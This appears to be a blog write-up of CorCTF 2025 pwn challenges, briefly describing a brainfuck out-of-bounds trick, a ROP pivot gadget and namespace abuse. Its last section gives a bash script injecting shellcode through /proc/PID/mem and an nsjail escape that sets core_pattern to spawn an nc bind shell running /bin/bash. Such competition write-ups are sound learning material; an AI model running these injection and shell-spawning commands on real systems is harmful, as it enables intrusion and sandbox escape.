---
title: "CorCTF 2025: Pwn (no windows)"
date: 2025-09-01 12:35:33
tags: 
layout: post
---
<!---more-->

# 📑 Prologue
We @r3kapig and @ProjectSEKAIctf got 2nd place in CorCTF! Thank my teammates and
@cor_ctf for the good time. I solved 2.5 PWN challenges and could have solved
one more challenge if I had 30 more minutes after the game. I have been
believing it's a kernel 1-day challenge for 2 days.

# frogcompute

I noticed the OOB access and changed the length limit but failed to construct the brainfuck program in limited bytes.

Skills I learned from my teammate @Sueasp, who finally solved the chal. This skill would move until some byte, e.g., move until 0xff: `[>>>>>>>>+]`.

With this we'll stop at rbp and then we change the retaddress to win function.

# hangbuzz101

This chal's fs is readonly but we are alow to create new namespace so we can create one and mount an tmpfs. Then we can run a random syzprog to trigger the warning.

# zenerational-aura

Use the gadget: 0xffffffff81605e07 to pivot so we can run our ROP.

# tua-cugina-systems
We failed to solve this but we are super close. we may need 30mins more to solve it. I mislead the team to think it's 1-day kernel chal.
At the end we found it's a user space + pentesting chal.


Inject the asm to the process
```bash
#!/bin/bash
busybox sleep 15 &
VICTIM=$(pgrep -f "busybox sleep 15") && echo $VICTIM && LEAK=$(awk 'NR==1{split($1,a,"-");print a[1]}' /proc/$VICTIM/maps) && NEW_HEX=$(printf "%x" $((0x$LEAK))) && DEC_NEW=$((0x$NEW_HEX))
( printf '%*s' 761856 '' | tr ' ' '\x90'; printf $SHELLCODE ) | dd of=/proc/$VICTIM/mem bs=1 seek=$DEC_NEW conv=notrunc status=none
```

In the shellcode, we 
1) memfd_create to put our lib in and use snprintf to bypass the name limit.
2) run `TC_LIB_DIR=/proc/self//fd////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////3 tc exec e`
3) escape the nsjail: `echo '|/usr/bin/nc -lvnp 8165 -e /bin/bash' > /proc/sys/kernel/core_pattern` and `nc localhost 8165`(steal from other people eploited it)

# Epilogue

Cool CTF, had great time.